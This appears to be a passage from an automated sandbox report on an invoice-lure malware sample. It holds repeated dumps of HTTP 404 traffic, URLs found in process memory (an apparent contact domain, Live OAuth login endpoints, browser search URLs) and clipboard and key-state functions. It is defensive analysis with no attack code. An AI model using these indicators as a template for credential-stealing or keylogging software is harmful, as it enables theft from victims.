68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:35 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:37:59 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:38:02 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:38:05 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 27 Feb 2025 14:38:07 GMTserver: LiteSpeedstrict-transport-security: max-age=63072000; includeSubDomainsx-frame-options: SAMEORIGINx-content-type-options: nosniffData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background

Source: b7xVJvvK.exe, 0000000B.00000002.3725702322.0000000003A98000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
Source: takeown.exe, 0000000A.00000002.3726476192.0000000004086000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.0000000003906000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.nan21.ro
Source: b7xVJvvK.exe, 0000000B.00000002.3727463287.000000000585D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.visualizar.xyz
Source: b7xVJvvK.exe, 0000000B.00000002.3727463287.000000000585D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.visualizar.xyz/u73x/
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: takeown.exe, 0000000A.00000002.3726476192.00000000046CE000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.0000000003F4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
Source: takeown.exe, 0000000A.00000002.3726476192.00000000046CE000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.0000000003F4E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033J
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: takeown.exe, 0000000A.00000002.3723139760.00000000030AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: takeown.exe, 0000000A.00000003.1682570349.0000000007E60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: takeown.exe, 0000000A.00000002.3728529895.0000000007E8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_007A4164

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_007A4164

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

1_2_007A3F66

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0079001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

1_2_0079001C

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

